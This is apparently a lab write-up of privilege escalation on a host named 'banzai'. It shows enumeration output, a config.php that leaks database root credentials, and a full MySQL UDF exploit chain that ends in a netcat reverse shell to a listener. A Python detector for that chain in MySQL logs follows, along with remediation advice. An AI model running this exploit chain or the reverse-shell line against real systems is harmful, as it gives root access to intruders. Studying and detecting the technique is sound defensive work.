Priv Escalation

There seems to be a MySQL service running on localhost

โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•โ•ฃ Active Ports
โ•š https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 :::8295                 :::*                    LISTEN      -                   
tcp6       0      0 :::8080                 :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::5432                 :::*                    LISTEN      -                   
tcp6       0      0 :::25                   :::*                    LISTEN      -      

Other interesting files

www-data@banzai:/var/www$ cat config.php
cat config.php
<?php
define('DBHOST', '127.0.0.1');
define('DBUSER', 'root');
define('DBPASS', 'EscalateRaftHubris123');
define('DBNAME', 'main');
?>
www-data@banzai:/var/www$ 

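Once we have credentials for an internal database, we can start checking whether it is vulnerable to the UDF (user-defined function) privilege escalation method.

The exploit loads a shared library into MySQL as a user-defined function; that function executes OS commands with the privileges of the MySQL server process, which here is root.

Depending on the target architecture, we download the 32-bit or 64-bit .so file.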

# Find plugin directory
SHOW VARIABLES LIKE 'plugin_dir';
select @@plugin_dir;

# Local method
use mysql;
create table tranilment(line blob);
insert into tranilment values(load_file('/tmp/lib_mysqludf_sys_64.so'));
select * from tranilment into dumpfile '/<plugin_dir>/lib_mysqludf_sys_64.so';
create function sys_exec returns integer soname 'lib_mysqludf_sys_64.so';
select sys_exec('nc <listener_ip> 1234 -e /bin/bash');

And we have root.
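
On the detection side, the statement sequence above stands out in the MySQL general query log. The following Python code is an added example, not part of the original write-up: it flags any connection that writes a .so with INTO DUMPFILE and then registers it with CREATE FUNCTION ... SONAME. The log lines are constructed, the line layout (timestamp, thread id, command, argument) is assumed to be the general-log format, and `/path/to/plugin_dir` and `<command>` are placeholders.

```python
import re

# Constructed sample of general query log lines (assumed layout:
# timestamp <TAB> thread-id command <TAB> argument). Paths are placeholders.
SAMPLE_LOG = """\
2024-01-01T10:00:01.000000Z\t   21 Connect\troot@localhost on mysql using TCP/IP
2024-01-01T10:00:02.000000Z\t   21 Query\tselect @@plugin_dir
2024-01-01T10:00:03.000000Z\t   21 Query\tcreate table tranilment(line blob)
2024-01-01T10:00:04.000000Z\t   21 Query\tinsert into tranilment values(load_file('/tmp/lib_mysqludf_sys_64.so'))
2024-01-01T10:00:05.000000Z\t   21 Query\tselect * from tranilment into dumpfile '/path/to/plugin_dir/lib_mysqludf_sys_64.so'
2024-01-01T10:00:06.000000Z\t   21 Query\tcreate function sys_exec returns integer soname 'lib_mysqludf_sys_64.so'
2024-01-01T10:00:07.000000Z\t   21 Query\tselect sys_exec('<command>')
2024-01-01T10:00:08.000000Z\t   34 Query\tselect id, name from main.users where id = 7
"""

LINE = re.compile(r"^(\S+)\t\s*(\d+) ([^\t]+)\t(.*)$")
RULES = {
    "load_shared_object": re.compile(r"load_file\s*\(\s*'[^']+\.so'", re.I),
    "dumpfile_shared_object": re.compile(r"into\s+dumpfile\s+'[^']+\.so'", re.I),
    "create_udf": re.compile(r"create\s+(?:aggregate\s+)?function\s+\w+\s+returns\s+\w+\s+soname\s+'[^']+'", re.I),
    "sys_exec_call": re.compile(r"\bsys_exec\s*\(", re.I),
}

def scan(log_text):
    """Return {thread_id: [(timestamp, rule_name), ...]} for matching Query lines."""
    hits = {}
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m or m.group(3) != "Query":
            continue  # skip Connect/Quit lines and anything unparseable
        ts, thread, _, arg = m.groups()
        for name, rx in RULES.items():
            if rx.search(arg):
                hits.setdefault(int(thread), []).append((ts, name))
    return hits

def udf_chain_threads(hits):
    """Threads that wrote a .so via DUMPFILE and afterwards registered a UDF."""
    flagged = []
    for thread, events in hits.items():
        names = [n for _, n in events]
        if ("dumpfile_shared_object" in names and "create_udf" in names
                and names.index("dumpfile_shared_object") < names.index("create_udf")):
            flagged.append(thread)
    return sorted(flagged)

if __name__ == "__main__":
    print(udf_chain_threads(scan(SAMPLE_LOG)))
```

The same conditions are worth removing at the source: the web application's config.php connects as the database root user, and the UDF runs as root only because the server process does.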
